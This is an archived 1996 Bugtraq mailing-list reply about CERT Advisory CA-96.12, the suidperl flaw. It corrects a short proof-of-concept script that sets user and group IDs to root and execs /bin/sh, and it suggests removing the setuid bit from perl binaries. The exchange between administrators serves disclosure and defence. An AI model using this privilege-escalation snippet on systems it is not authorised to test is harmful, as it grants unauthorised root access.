[2842] in bugtraq
Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability
daemon@ATHENA.MIT.EDU (James Seng)
Sun Jun 30 12:55:10 1996
Date: Sun, 30 Jun 1996 17:34:07 +1000
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: James Seng <jseng@pobox.org.sg>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
Actually, it should be suidperl, not perl.
It should read as
#!/usr/bin/suidperl
$>=0; $<=0; # Set UID and GID = 0
exec("/bin/sh");
According to the advisory, perl4 and 5 are both susceptible to it so long
you have enable setuid bit emulation (with is by default for most system).
I just do "chmod u-s /usr/bin/*perl*" since i dont use for suid script.
-James Seng
At 11:53 PM 6/29/96 -0400, Brian Tao wrote:
> Exactly which versions of perl are susceptible to this? I tried
>it using /usr/contrib/bin/perl on a BSD/OS 2.0 system as well as
>/usr/bin/perl on FreeBSD 2.1/2.2 systems, and none gave a root shell.
>--
>Brian Tao (BT300, taob@io.org, taob@ican.net)
>Systems and Network Administrator, Internet Canada Corp.
>"Though this be madness, yet there is method in't"
>
>
